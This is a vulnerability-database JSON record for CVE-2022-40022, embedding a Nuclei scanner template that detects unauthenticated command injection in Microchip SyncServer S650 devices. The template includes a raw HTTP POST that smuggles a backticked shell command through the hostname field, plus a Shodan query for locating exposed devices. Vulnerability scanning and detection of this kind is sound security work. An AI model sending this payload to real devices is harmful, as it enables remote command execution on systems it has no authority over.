{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-40022/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-40022/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-40022/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-40022/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-40022/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-40022"},"sightings":{"href":"/api/v1/sightings/cve-2022-40022"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-40022.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-40022\n\ninfo:\n  name: Symmetricom SyncServer Unauthenticated - Remote Command Execution\n  author: DhiyaneshDK,mielverkerken\n  severity: critical\n  description: |\n    Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.\n  remediation: |\n    Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.\n  reference:\n    - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-40022\n    - https://www.microsemi.com/campaigns/network-time-servers/S650p/%3Fgd%3D1&id=5&gclid=Cj0KCQjwjbyYBhCdARIsAArC6LL-202ej5YfDB5lMIMSZ2735qjo5yaj2i-PrvLv2Cnh_kIJtFJ0oF8aAlMpEALw_wcB\n    - https://www.microsemi.com/campaigns/network-time-servers/syncserver-s600/?url=\n    - https://www.microsemi.com/document-portal/doc_download/135737-datasheet-syncserver-s650\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-40022\n    cwe-id: CWE-77\n    epss-score: 0.92472\n    epss-percentile: 0.99823\n    cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:*\n  metadata:\n    verified: \"true\"\n    max-request: 1\n    vendor: microchip\n    product: syncserver_s650\n    shodan-query: html:\"Symmetricom SyncServer\"\n  tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /controller/ping.php HTTP/1.1\n        Host: {{Hostname}}\n        Origin: {{RootURL}}\n        Content-Type: application/x-www-form-urlencoded\n        Referer: {{RootURL}}/controller/ping.php\n\n        currentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"uid=([0-9(a-z)]+)\"\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 302\n\n      - type: word\n        part: header\n        words:\n          - \"cloudflare\"\n        negative: true\n# digest: 4b0a00483046022100957766a33315cbc2b81918d91a60aed8677b15512c333da30767c0dfba176b0b022100fc9124d5d2c19b686537f0a2ca005a2f2f6756ede1ca999da643573cc28ff0f0:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2022-40022"}